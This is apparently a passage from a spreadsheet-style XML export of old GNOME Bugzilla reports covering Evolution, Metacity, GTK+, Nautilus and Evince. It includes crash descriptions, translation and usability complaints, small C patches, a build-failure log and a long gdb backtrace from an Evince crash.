#: ../gsearchtool/gsearchtool.c:777 ../gsearchtool/gsearchtool.c:815
# c-format
msgid %d file found
msgid_plural %d files found
(identical bar capital letters: is this necessary?)</t>
  </si>
  <si>
    <t>AT-SPI-393009</t>
  </si>
  <si>
    <t>Java bridge should use REGISTRY IOR XAtom instead of bonobo-activation</t>
  </si>
  <si>
    <t>Since the logic of at-spi-registryd has changed Java bridge should use REGISTRY IOR XAtom instead of bonobo-activation.</t>
  </si>
  <si>
    <t>EVOLUTION-256251</t>
  </si>
  <si>
    <t>evolution-wombat crashes very frequently</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 1 (Yarrow)
Package: Evolution
Priority: Major
Version: GNOME2.4.0 1.4.5
Gnome-Distributor: GNOME.Org
Synopsis: evolution-wombat crashes very frequently
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Bugzilla-Version: 1.4.5
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
evolution-wombat crashes on a regular basis.  This always happens at
start-up and then periodically after that while I'm performing certain
operations such as composing a new message.
Steps to reproduce the crash:
1. Start evolution.
2. evolution-wombat crashes.
3. 
Expected Results:
evolution-wombat should not crash.
How often does this happen?
Regularly during normal evolution use such as at start-up or when
composing a messge.
Additional Information:
This started happening on my Fedora Core 1 box after I upgraded to an
Athlon64.  It never happened with my old x86 box.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>rjwalsh10</t>
  </si>
  <si>
    <t>EVOLUTION-205400</t>
  </si>
  <si>
    <t>Cannot add shortcut for My Evolution</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.11.99-snap.ximian.200107240800
Synopsis: Cannot add shortcut for My Evolution
Bugzilla-Product: Evolution
Bugzilla-Component: My Evolution
Description:
In the Folders pane click right on most anything.  Note that it is possible to add it
to the shortcuts menu.  This cannot be done with My Evolution.  It would be really
handy to be able to add that shortcut as it would make it more palatable to keep the
folders pane minimized.
</t>
  </si>
  <si>
    <t>gerdts</t>
  </si>
  <si>
    <t>NAUTILUS-41290</t>
  </si>
  <si>
    <t>Need to implement Redo</t>
  </si>
  <si>
    <t xml:space="preserve">There's a FIXME about this in nautilus-undo-manager.c
------- Additional Comments From eli@eazel.com 2000-10-16 20:06:30 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
</t>
  </si>
  <si>
    <t>METACITY-126872</t>
  </si>
  <si>
    <t>Non EWMH fullscreen apps are constrained within menu bars</t>
  </si>
  <si>
    <t>Non EWMH apps (like xine) which use traditional methods to request full
screen display (static gravity at 00 full width/height) are nevertheless
constrained by metacity to fall within the normal application area and not
cover the menu bar.
Index: constraints.c
===================================================================
RCS file: /cvs/gnome/metacity/src/constraints.cv
retrieving revision 1.19
diff -u -r1.19 constraints.c
--- constraints.c       7 Oct 2003 02:08:45 -0000       1.19
+++ constraints.c       13 Nov 2003 05:41:43 -0000
@@ -3407 +3407 @@
 constraint_onscreen_applies_func (MetaWindow *window)
 {
   return
-    !window-&gt;fullscreen &amp;&amp;
+    !window-&gt;fullscreen &amp;&amp; !meta_window_is_fullscreen_size (window) &amp;&amp;
     window-&gt;type != META_WINDOW_DESKTOP &amp;&amp;
     window-&gt;type != META_WINDOW_DOCK
 }
Index: stack.c
===================================================================
RCS file: /cvs/gnome/metacity/src/stack.cv
retrieving revision 1.67
diff -u -r1.67 stack.c
--- stack.c     19 Aug 2003 20:10:45 -0000      1.67
+++ stack.c     13 Nov 2003 05:41:45 -0000
@@ -1788 +1788 @@
   meta_stack_sync_to_server (stack)
 }
-static gboolean
-window_is_fullscreen_size (MetaWindow *window)
+gboolean
+meta_window_is_fullscreen_size (MetaWindow *window)
 {
   int i
@@ -2687 +2687 @@
         layer = META_LAYER_BOTTOM
       else if ((window-&gt;has_focus || focused_transient ||
                 (window == window-&gt;display-&gt;expected_focus_window)) &amp;&amp;
-               (window-&gt;fullscreen || window_is_fullscreen_size (window)))
+               (window-&gt;fullscreen || meta_window_is_fullscreen_size
(window)))
         layer = META_LAYER_FULLSCREEN
       else if (window-&gt;wm_state_above)
         layer = META_LAYER_DOCK
Index: stack.h
===================================================================
RCS file: /cvs/gnome/metacity/src/stack.hv
retrieving revision 1.16
diff -u -r1.16 stack.h
--- stack.h     22 Jan 2003 04:54:03 -0000      1.16
+++ stack.h     13 Nov 2003 05:41:45 -0000
@@ -1106 +1108 @@
 void       meta_stack_freeze    (MetaStack      *stack)
 void       meta_stack_thaw      (MetaStack      *stack)
+gboolean   meta_window_is_fullscreen_size (MetaWindow  *window)
+
 MetaWindow* meta_stack_get_top    (MetaStack  *stack)
 MetaWindow* meta_stack_get_bottom (MetaStack  *stack)
 MetaWindow* meta_stack_get_above  (MetaStack  *stack</t>
  </si>
  <si>
    <t>GNOME-APPLETS-8179</t>
  </si>
  <si>
    <t>Crashed (tasklist_applet Crash at 128.227.184.152)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Version: 1.0.53
Severity: 
&gt;Synopsis: Crashed
&gt;Class: sw-bug
System: Linux Redhat 6.0
&gt;Description:
Unknown seg fault produced
&gt;How-To-Repeat:
First time Ive seen this problem.  I was using
Rational Rose at the time.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:55 -------
This bug was previously known as bug 8179 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=8179
Originally filed under the gnome-applets product and general component.
The original reporter (dan@astro.ufl.edu) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GGV-96480</t>
  </si>
  <si>
    <t>Text Beside Icons Toolbar Option not working for GGV</t>
  </si>
  <si>
    <t>Build Details - Sun Build Stable 12.
CVS Snapshot - Tue Oct 15 15:00:00 BST 2002
Do the following
1. Log into Gnome-Desktop. 
2. Open menu &amp; toolbar preferences capplet.
3. Keep GGV also open.
4. Change the  toolbar button label style to Text beside Icons in menu &amp;
toolbar preferences capplet.
Expected Behaviour : The text should be beside the icon. 
Current Behaviour : The Only Icon style shows up.
Note - 
1. Noticeable on linux also.
2. Glade works fine.</t>
  </si>
  <si>
    <t>GTK+-439480</t>
  </si>
  <si>
    <t>the recent-files code lacks translation in various places.
gtk_recent_chooser_default_add_filter:
    name = Untitled filter
gtk_recent_manager_real_changed:
          filename_warning (Attempting to store changes into `%s' 
			    but failed: %s
			    priv-&gt;filename
			    write_error-&gt;message)
          filename_warning (Unable to stat() the recently used resources file 
			    at `%s': %s.
			    priv-&gt;filename
			    g_strerror (errno))
[fixing the latter probably will make it necessary to save errno]
gtk_recent_manager_poll_timeout:
      filename_warning (Unable to stat() the recently used resources file 
			at `%s': %s.
			priv-&gt;filename
			g_strerror (errno))
build_recent_items_list:
          filename_warning (Attempting to read the recently used resources file 
			    at `%s' but an error occurred: %s. Aborting.
			    priv-&gt;filename
			    g_strerror (errno))
      filename_warning (Attempting to read the recently used resources file 
			at `%s' but the parser failed: %s.
			priv-&gt;filename
			read_error-&gt;message)
get_uri_shortname_for_display:
      name = g_strdup_printf (%s: %s method local_file)
[rtl languages might want something else here.  some language might require
a space before the colon]
gtk_recent_chooser_menu_create_item:
      if (count &lt;= 10)
        label = g_strdup_printf (_%d. %s count escaped)
      else
        label = g_strdup_printf (%d. %s count escaped)
[As above.  Also s/10/9/.]</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-374775</t>
  </si>
  <si>
    <t>Build failure due to omf creation</t>
  </si>
  <si>
    <t>xsltproc -o gcalctool-C.omf --stringparam db2omf.basename gcalctool --stringparam db2omf.format 'docbook' --stringparam db2omf.dtd -//OASIS//DTD DocBook XML V4.1.2//EN --stringparam db2omf.lang C --stringparam db2omf.omf_dir /opt/gnome2/share/omf --stringparam db2omf.help_dir /opt/gnome2/share/gnome/help --stringparam db2omf.omf_in `pwd`/./gcalctool.omf.in --stringparam db2omf.scrollkeeper_cl `scrollkeeper-config --pkgdatadir`/Templates/C/scrollkeeper_cl.xml `/opt/gnome2/bin/pkg-config --variable db2omf gnome-doc-utils` C/gcalctool.xml || { rm -f gcalctool-C.omf exit 1 }
db2omf: Missing element with role maintainer
make: *** [gcalctool-C.omf] Error 1</t>
  </si>
  <si>
    <t>NAUTILUS-512778</t>
  </si>
  <si>
    <t>File operations window always on top and unminimizable</t>
  </si>
  <si>
    <t>This report has been filled here:
https://bugs.launchpad.net/ubuntu/+source/nautilus/+bug/185339
The File operations popup window in the new gvfs-enabled Nautilus in Hardy always stays on top has no minimize button and cannot be minimized by clicking on its window list entry. This results in having to view the progresses of the file operations in the forefront which is not acceptable in a multitasking environment.</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME-157864</t>
  </si>
  <si>
    <t>Icons for Coaster</t>
  </si>
  <si>
    <t>4 icons are needed:
the coaster application icon
3 mime-type icons: application/x-blf application/x-bla application/x-blv</t>
  </si>
  <si>
    <t>EVOLUTION-271924</t>
  </si>
  <si>
    <t>Sentence splitting in Evolution calendar a11y messages</t>
  </si>
  <si>
    <t>#: a11y/calendar/ea-cal-view-event.c:258
msgid event. Summary is 
#: a11y/calendar/ea-cal-view-event.c:235
msgid alarm 
#: a11y/calendar/ea-cal-view-event.c:241
msgid recurrence 
#: a11y/calendar/ea-cal-view-event.c:247
msgid time-zone 
#: a11y/calendar/ea-cal-view-event.c:253
msgid meeting 
#: a11y/calendar/ea-cal-view-event.c:269
msgid empty
Please *never* split translateable sentences lake this. When doing this
you assume that all English grammar applies to all other languages of the
world. But sentences can only properly be translated into other languages
in their entirety since rules of grammar gender word order pronouns
suffixes and everything else vary a lot between languages. See
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#split-sentences
for more about this topic.
Please provide full sentences instead. Even if it may mean more
translateable messages this is very much preferrable to a situation where
hardly noone will be able to translate the sentence fragments and make
sensible translated sentences out of them.</t>
  </si>
  <si>
    <t>GTK+-108092</t>
  </si>
  <si>
    <t>ctrl-shif right arrow should expand node</t>
  </si>
  <si>
    <t>When keynaving a tree view ctrl-arrow moves around without modifying the
selection. If you want to expand a node you need to use shift right arrow
though. It would be nice if ctrl-shift right arrow worked to so you don't
have to release ctrl.</t>
  </si>
  <si>
    <t>GNOME-PANEL-116883</t>
  </si>
  <si>
    <t>pane typo in gnome-panel message</t>
  </si>
  <si>
    <t>#: gnome-panel/panel-object.schemas.in.h:10
msgid Lock the object to the pane
panel is misspelled.
I believe this typo came in with a patch by chris@gnome-de.org in bug 112527.</t>
  </si>
  <si>
    <t>GTKHTML-200450</t>
  </si>
  <si>
    <t>incorrect size allocation</t>
  </si>
  <si>
    <t>gtkhtml widget in a scrolled window.  When we initially display the widget the
size is not reported correctly so that the scrollbar refuses to scroll down. 
Only after hilighting some text does the correct size get calculated and the
scrollbar updates to display the full size of the gtkhtml widget.</t>
  </si>
  <si>
    <t>GNUMERIC-310518</t>
  </si>
  <si>
    <t>days360 is not Excel-compatible when method&gt;2</t>
  </si>
  <si>
    <t>When method&gt;2 the result is the same as with method==0.
Even with gnumeric extension for method==2 it should use default method==1 
because in Excel method is boolean</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-87346</t>
  </si>
  <si>
    <t>gdk-card-image build failure on Solaris</t>
  </si>
  <si>
    <t xml:space="preserve">In gnome-games HEAD freecell/gdk-card-image/gdk-card-image.c needs
sys/dirent.h on Solaris.
The patch below adds a check for this header to configure.in and
includes it in the C file if found.
Index: configure.in
===================================================================
RCS file: /cvs/GNOME-RE/gnome-games/configure.inv
retrieving revision 1.192
diff -u -r1.192 configure.in
--- configure.in	2002/06/27 16:46:38	1.192
+++ configure.in	2002/07/04 14:59:28
@@ -1056 +1058 @@
   ])
 AC_SUBST(UCB_CFLAGS)
+AC_CHECK_HEADERS(sys/dirent.h)
+
 if test x$sys_dir_h_found = xyes then
   AC_DEFINE(HAVE_SYS_DIR_H)
   AC_MSG_CHECKING([if sys/dir.h defines struct direct or dirent])
Index: freecell/gdk-card-image/gdk-card-image.c
===================================================================
RCS file:
/cvs/GNOME-RE/gnome-games/freecell/gdk-card-image/gdk-card-image.cv
retrieving revision 1.21
diff -u -r1.21 gdk-card-image.c
--- freecell/gdk-card-image/gdk-card-image.c	2002/06/05 22:13:33	1.21
+++ freecell/gdk-card-image/gdk-card-image.c	2002/07/04 14:59:28
@@ -277 +279 @@
 #include 
 #include 
-#ifdef HAVE_SYS_DIR_H
+#ifdef HAVE_SYS_DIRENT_H
+#include 
+#elif defined(HAVE_SYS_DIR_H)
 #include 
 #else
 #include </t>
  </si>
  <si>
    <t>EVINCE-300615</t>
  </si>
  <si>
    <t>edgeware document causes predictable crash</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Unknown
Package: evince
Severity: critical
Version: GNOME2.10.0 0.2.x
Gnome-Distributor: FreeBSD GNOME Project
Synopsis: edgeware document causes predictable crash
Bugzilla-Product: evince
Bugzilla-Component: general
Bugzilla-Version: 0.2.x
BugBuddy-GnomeVersion: 2.0 (2.10.0)
Description:
Description of the crash:
On loading this document Evince crashes.
	http://www.cuttedge.com/manuals/edgeware_user_guide.pdf
Steps to reproduce the crash:
1. Download http://www.cuttedge.com/manuals/edgeware_user_guide.pdf
2. Open (via Nautalis) the document in Evince
Expected Results:
Adobe AcroReader can open and use the document successfully. gpdf
reports errors on many pages but does not crash.
Debugging Information:
Backtrace was generated from '/usr/X11R6/bin/evince'
(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0x0000000801c517a4 in
pthread_testcancel () from /usr/lib/libpthread.so.1
#0  0x0000000801c517a4 in pthread_testcancel () from
/usr/lib/libpthread.so.1
#1  0x000000000000003c in ?? ()
#2  0x0000000000000000 in ?? ()
#3  0x00000000425e7e17 in ?? ()
#4  0x0000000039c13634 in ?? ()
#5  0x0000000000539000 in ?? ()
#6  0x0000000000000000 in ?? ()
#7  0x0000000801d57bd8 in _thread_state_running ()
   from /usr/lib/libpthread.so.1
#8  0x0000000801c49f38 in pthread_mutexattr_init ()
   from /usr/lib/libpthread.so.1
#9  0x0000000801c4de2f in pthread_setconcurrency ()
   from /usr/lib/libpthread.so.1
#10 0x0000000000000000 in ?? ()
#11 0x000000000053e000 in ?? ()
#12 0x0000000000539000 in ?? ()
#13 0x0000000000000000 in ?? ()
#14 0x0000000000000000 in ?? ()
#15 0x0000000000000000 in ?? ()
#16 0x0000000000000000 in ?? ()
#17 0x0000000000000000 in ?? ()
#18 0x0000000000000001 in ?? ()
#19 0x0000000801c49c90 in pthread_mutexattr_init ()
   from /usr/lib/libpthread.so.1
#20 0x000000000053a000 in ?? ()
#21 0x0000000000004000 in ?? ()
#22 0x0000000000000000 in ?? ()
#23 0x0000000000539000 in ?? ()
#24 0x00000000425e7e17 in ?? ()
#25 0x0000000039c13634 in ?? ()
#26 0x0001877e00004e20 in ?? ()
#27 0x0000000000000000 in ?? ()
#28 0x0000000000000000 in ?? ()
#29 0x0000000000000000 in ?? ()
#30 0x0000000000000000 in ?? ()
#31 0x0000000000000000 in ?? ()
#32 0x0000000000000000 in ?? ()
#33 0x0000000000000000 in ?? ()
#34 0x0000000000000000 in ?? ()
#35 0x0000000000000000 in ?? ()
#36 0x0000000000000000 in ?? ()
#37 0x0000000000000000 in ?? ()
#38 0x0000000000000000 in ?? ()
#39 0x0000000000000000 in ?? ()
#40 0x0000000000000000 in ?? ()
#41 0x0000000000000000 in ?? ()
#42 0x0000000000539000 in ?? ()
#43 0x0000000000539030 in ?? ()
#44 0x0000000000541000 in ?? ()
#45 0x000000000058c030 in ?? ()
#46 0x0000000000589000 in ?? ()
#47 0x0000000801d57710 in _thread_state_running ()
   from /usr/lib/libpthread.so.1
#48 0x0000000000000000 in ?? ()
#49 0x000000000053e130 in ?? ()
#50 0x000000000053f000 in ?? ()
#51 0x0000000000000080 in ?? ()
#52 0x0000000000000000 in ?? ()
#53 0x0000000000541000 in ?? ()
#54 0x0000000000541288 in ?? ()
#55 0x0000000000538200 in ?? ()
#56 0x0000000000538300 in ?? ()
#57 0x0000000000000002 in ?? ()
#58 0x0000000801c49010 in pthread_mutexattr_init ()
   from /usr/lib/libpthread.so.1
#59 0x0000000801c490a0 in pthread_mutexattr_init ()
   from /usr/lib/libpthread.so.1
#60 0x0000000100000002 in ?? ()
#61 0x0000000000000001 in ?? ()
#62 0x0000000000000000 in ?? ()
#63 0x0000000000000000 in ?? ()
#64 0x0000000000000000 in ?? ()
#65 0x0000000000000000 in ?? ()
#66 0x0000000000000000 in ?? ()
#67 0x0000000000000000 in ?? ()
#68 0x0000000000000000 in ?? ()
#69 0x0000000000000000 in ?? ()
#70 0x0000000000000000 in ?? ()
#71 0x0000000000000000 in ?? ()
#72 0x0000000000000000 in ?? ()
#73 0x0000000000000000 in ?? ()
#74 0x000000000000000f in ?? ()
#75 0x000000000053e248 in ?? ()
#76 0x0000000000000000 in ?? ()
#77 0x0000000000000000 in ?? ()
#78 0x0000000000000000 in ?? ()
#79 0x0000000000000000 in ?? ()
#80 0x0000000000000000 in ?? ()
#81 0x0000000000000000 in ?? ()
#82 0x0000000000000000 in ?? ()
#83 0x0000000000000000 in ?? ()
#84 0x0000000000000000 in ?? ()
#85 0x0000000000000000 in ?? ()
#86 0x0000000000000000 in ?? ()
#87 0x000000000053e288 in ?? ()
#88 0x0000000000000000 in ?? ()
#89 0x000000000053e289 in ?? ()
#90 0x0000000000000000 in ?? ()
#91 0x0000000000000000 in ?? ()
#92 0x0000000000000000 in ?? ()
#93 0x0000000000000000 in ?? ()
#94 0x0000000000000000 in ?? ()
#95 0x0000000000000000 in ?? ()
#96 0x0000000000000000 in ?? ()
#97 0x0000000000000000 in ?? ()
#98 0x0000000000000000 in ?? ()
#99 0x0000000000000000 in ?? ()
#100 0x0000000000000000 in ?? ()
#101 0x0000000000000000 in ?? ()
#102 0x0000000000000000 in ?? ()
#103 0x0000000000000000 in ?? ()
#104 0x0000000000000000 in ?? ()
#105 0x0000000000000000 in ?? ()
#106 0x0000000000000055 in ?? ()
#107 0x000000000053e348 in ?? ()
#108 0x0000000000050020 in ?? ()
#109 0x0000000000000000 in ?? ()
#110 0x0000000000000000 in ?? ()
#111 0x0000000000000000 in ?? ()
#112 0x0000000000000000 in ?? ()
#113 0x0000000000000000 in ?? ()
#114 0x0000000000579ec0 in ?? ()
#115 0x0000000802216b10 in g_enum_types_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#116 0x0000000000000000 in ?? ()
#117 0x0000000802216b20 in g_enum_types_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#118 0x0000000000000000 in ?? ()
#119 0x000000000053e388 in ?? ()
#120 0x0000000802216b30 in g_enum_types_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#121 0x000000000053e38a in ?? ()
#122 0x0000000802216b40 in g_enum_types_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#123 0x0000000000700069 in ?? ()
#124 0x0000000000000000 in ?? ()
#125 0x0000000000000000 in ?? ()
#126 0x0000000000000000 in ?? ()
#127 0x0000000000000000 in ?? ()
#128 0x0000000000000000 in ?? ()
#129 0x0000000000000000 in ?? ()
#130 0x0000000000000000 in ?? ()
#131 0x0000000000000000 in ?? ()
#132 0x0000000000000000 in ?? ()
#133 0x0000000000000000 in ?? ()
#134 0x0000000000000000 in ?? ()
#135 0x0000000000000000 in ?? ()
#136 0x0000000000000000 in ?? ()
#137 0x0000000000000000 in ?? ()
#138 0x0000000000000008 in ?? ()
#139 0x000000000053e448 in ?? ()
#140 0x0000000000050018 in ?? ()
#141 0x0000000000000000 in ?? ()
#142 0x0000000000000000 in ?? ()
#143 0x0000000000000000 in ?? ()
#144 0x0000000000000000 in ?? ()
#145 0x0000000000000000 in ?? ()
#146 0x0000000000538ca0 in ?? ()
#147 0x0000000802216b10 in g_enum_types_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#148 0x0000000000000000 in ?? ()
#149 0x0000000802216b20 in g_enum_types_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#150 0x0000000000000000 in ?? ()
#151 0x000000000053e488 in ?? ()
#152 0x0000000802216b30 in g_enum_types_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#153 0x000000000053e48a in ?? ()
#154 0x0000000802216b40 in g_enum_types_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#155 0x0000000000700069 in ?? ()
#156 0x0000000000000000 in ?? ()
#157 0x0000000000000000 in ?? ()
#158 0x0000000000000000 in ?? ()
#159 0x0000000000000000 in ?? ()
#160 0x0000000000000000 in ?? ()
#161 0x0000000000000000 in ?? ()
#162 0x0000000000000000 in ?? ()
#163 0x0000000000000000 in ?? ()
#164 0x0000000000000000 in ?? ()
#165 0x0000000000000000 in ?? ()
#166 0x0000000000000000 in ?? ()
#167 0x0000000000000000 in ?? ()
#168 0x0000000000000000 in ?? ()
#169 0x0000000000000000 in ?? ()
#170 0x0000000000000023 in ?? ()
#171 0x000000000053e560 in ?? ()
#172 0x0000000000050050 in ?? ()
#173 0x000000080221d230 in g_param_type_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#174 0x000000080221d250 in g_param_type_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#175 0x0000000000000000 in ?? ()
#176 0x0000000000000000 in ?? ()
#177 0x0000000000548f80 in ?? ()
#178 0x0000000000000048 in ?? ()
#179 0x000000080221d2a0 in g_param_type_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#180 0x0000000000000000 in ?? ()
#181 0x000000080221e560 in g_param_values_cmp ()
   from /usr/local/lib/libgobject-2.0.so.600
#182 0x000000080221e570 in g_param_values_cmp ()
   from /usr/local/lib/libgobject-2.0.so.600
#183 0x000000080221e590 in g_param_values_cmp ()
   from /usr/local/lib/libgobject-2.0.so.600
#184 0x000000080221e620 in g_param_values_cmp ()
   from /usr/local/lib/libgobject-2.0.so.600
#185 0x000000000053e5a0 in ?? ()
#186 0x000000080221e630 in g_param_values_cmp ()
   from /usr/local/lib/libgobject-2.0.so.600
#187 0x000000000053e5a2 in ?? ()
#188 0x000000080221e700 in g_param_values_cmp ()
   from /usr/local/lib/libgobject-2.0.so.600
#189 0x0000000000700070 in ?? ()
#190 0x0000000000000000 in ?? ()
#191 0x0000000000000000 in ?? ()
#192 0x0000000000000000 in ?? ()
#193 0x0000000000000000 in ?? ()
#194 0x0000000000000000 in ?? ()
#195 0x0000000000000000 in ?? ()
#196 0x0000000000000000 in ?? ()
#197 0x0000000000000000 in ?? ()
#198 0x0000000000000000 in ?? ()
#199 0x0000000000000000 in ?? ()
#200 0x0000000000000000 in ?? ()
#201 0x0000000000000061 in ?? ()
#202 0x000000000053e660 in ?? ()
#203 0x0000000000050088 in ?? ()
#204 0x0000000802217610 in g_object_type_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#205 0x0000000802217650 in g_object_type_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#206 0x00000008022176e0 in g_object_type_init ()
   from /usr/local/lib/libgobject-2.0.so.600
#207 0x0000000000000000 in ?? ()
#208 0x0000000000000000 in ?? ()
#209 0x000000000053e900 in ?? ()
#210 0x0000000000000018 in ?? ()
#211 0x0000000802217fd0 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#212 0x000000080221c670 in g_object_steal_data ()
   from /usr/local/lib/libgobject-2.0.so.600
#213 0x000000080221c6a0 in g_object_steal_data ()
   from /usr/local/lib/libgobject-2.0.so.600
#214 0x000000000053e6a0 in ?? ()
#215 0x000000080221c740 in g_object_steal_data ()
   from /usr/local/lib/libgobject-2.0.so.600
#216 0x000000080221c810 in g_object_steal_data ()
   from /usr/local/lib/libgobject-2.0.so.600
#217 0x0000000000000000 in ?? ()
#218 0x0000000000000000 in ?? ()
#219 0x0000000000000000 in ?? ()
#220 0x0000000000000000 in ?? ()
#221 0x0000000000000000 in ?? ()
#222 0x0000000000000000 in ?? ()
#223 0x0000000000000000 in ?? ()
#224 0x0000000000000000 in ?? ()
#225 0x0000000000000000 in ?? ()
#226 0x0000000000000000 in ?? ()
#227 0x0000000000000000 in ?? ()
#228 0x0000000000547780 in ?? ()
#229 0x0000000000547880 in ?? ()
#230 0x0000000000547980 in ?? ()
#231 0x0000000000547a80 in ?? ()
#232 0x0000000000547b80 in ?? ()
#233 0x0000000000547c80 in ?? ()
#234 0x0000000000547d80 in ?? ()
#235 0x0000000000547e80 in ?? ()
#236 0x0000000000547f80 in ?? ()
#237 0x0000000000548100 in ?? ()
#238 0x0000000000548180 in ?? ()
#239 0x0000000000548280 in ?? ()
#240 0x0000000000548380 in ?? ()
#241 0x0000000000548400 in ?? ()
#242 0x0000000000548500 in ?? ()
#243 0x0000000000548600 in ?? ()
#244 0x0000000000548700 in ?? ()
#245 0x0000000000548780 in ?? ()
#246 0x0000000000548980 in ?? ()
#247 0x0000000000548a80 in ?? ()
#248 0x0000000000548b80 in ?? ()
#249 0x0000000000000000 in ?? ()
#250 0x0000000000000000 in ?? ()
#251 0x0000000000000000 in ?? ()
#252 0x0000000000000000 in ?? ()
#253 0x0000000000000000 in ?? ()
#254 0x0000000000000000 in ?? ()
#255 0x0000000000000000 in ?? ()
#256 0x0000000000000000 in ?? ()
#257 0x0000000000000000 in ?? ()
#258 0x0000000000000000 in ?? ()
#259 0x0000000000000000 in ?? ()
#260 0x0000000000547780 in ?? ()
#261 0x0000000000547880 in ?? ()
#262 0x0000000000547980 in ?? ()
#263 0x0000000000547a80 in ?? ()
#264 0x0000000000547b80 in ?? ()
#265 0x0000000000547c80 in ?? ()
#266 0x0000000000547d80 in ?? ()
#267 0x0000000000547e80 in ?? ()
#268 0x0000000000547f80 in ?? ()
#269 0x0000000000548100 in ?? ()
#270 0x0000000000548180 in ?? ()
#271 0x0000000000548280 in ?? ()
#272 0x0000000000548380 in ?? ()
#273 0x0000000000548400 in ?? ()
#274 0x0000000000548500 in ?? ()
#275 0x0000000000548600 in ?? ()
#276 0x0000000000548700 in ?? ()
#277 0x0000000000548780 in ?? ()
#278 0x0000000000548980 in ?? ()
#279 0x0000000000548a80 in ?? ()
#280 0x0000000000548b80 in ?? ()
#281 0x0000000000000000 in ?? ()
#282 0x0000000000000000 in ?? ()
#283 0x0000000000000000 in ?? ()
#284 0x0000000000000000 in ?? ()
#285 0x0000000000000000 in ?? ()
#286 0x0000000000000000 in ?? ()
#287 0x0000000000000000 in ?? ()
#288 0x0000000000000000 in ?? ()
#289 0x0000000000000000 in ?? ()
#290 0x0000000000000000 in ?? ()
#291 0x0000000000000000 in ?? ()
#292 0x0000000000000050 in ?? ()
#293 0x0000000000000000 in ?? ()
#294 0x0000000802219c10 in g_object_new_valist ()
   from /usr/local/lib/libgobject-2.0.so.600
#295 0x0000000802218150 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#296 0x0000000802218270 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#297 0x0000000802218390 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#298 0x0000000000000000 in ?? ()
#299 0x0000000000000000 in ?? ()
#300 0x0000000000000000 in ?? ()
#301 0x0000000000000000 in ?? ()
#302 0x0000000000000000 in ?? ()
#303 0x0000000000000000 in ?? ()
#304 0x0000000000000000 in ?? ()
#305 0x0000000000000000 in ?? ()
#306 0x0000000000000020 in ?? ()
#307 0x00000008022390f0 in g_value_array_sort_with_data ()
   from /usr/local/lib/libgobject-2.0.so.600
#308 0x000000000000000c in ?? ()
#309 0x0000000000000024 in ?? ()
#310 0x0000000802239100 in g_value_array_sort_with_data ()
   from /usr/local/lib/libgobject-2.0.so.600
#311 0x000000000000000c in ?? ()
#312 0x0000000000000028 in ?? ()
#313 0x0000000802239110 in g_value_array_sort_with_data ()
   from /usr/local/lib/libgobject-2.0.so.600
#314 0x000000000000004c in ?? ()
#315 0x000000000000004c in ?? ()
#316 0x000000080221e5c0 in g_param_values_cmp ()
   from /usr/local/lib/libgobject-2.0.so.600
#317 0x0000000000000050 in ?? ()
#318 0x0000000000000050 in ?? ()
#319 0x000000080221c6d0 in g_object_steal_data ()
   from /usr/local/lib/libgobject-2.0.so.600
#320 0x0000000000548d00 in ?? ()
#321 0x000000000054a0f0 in ?? ()
#322 0x0000000802219c10 in g_object_new_valist ()
   from /usr/local/lib/libgobject-2.0.so.600
#323 0x000000080263fdd0 in gnome_program_get_type ()
   from /usr/X11R6/lib/libgnome-2.so.1000
#324 0x0000000802640150 in gnome_program_get_type ()
   from /usr/X11R6/lib/libgnome-2.so.1000
#325 0x0000000802218270 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#326 0x0000000802218390 in g_object_interface_list_properties ()
   from /usr/local/lib/libgobject-2.0.so.600
#327 0x0000000000000000 in ?? ()
#328 0x0000000000000000 in ?? ()
#329 0x0000000000000000 in ?? ()
#330 0x0000000000000000 in ?? ()
#331 0x0000000000000000 in ?? ()
#332 0x0000000000000000 in ?? ()
#333 0x0000000000000000 in ?? ()
#334 0x0000000000000000 in ?? ()
#335 0x0000000000000000 in ?? ()
#336 0x0000000000000000 in ?? ()
#337 0x0000000000000000 in ?? ()
#338 0x0000000000000000 in ?? ()
#339 0x0000000000000000 in ?? ()
#340 0x0000000000000000 in ?? ()
#341 0x0000000000000000 in ?? ()
#342 0x0000000000000000 in ?? ()
#343 0x0000000000000000 in ?? ()
#344 0x0000000000000000 in ?? ()
#345 0x0000000000000000 in ?? ()
#346 0x0000000000000000 in ?? ()
#347 0x0000000000000000 in ?? ()
#348 0x0000000000000000 in ?? ()
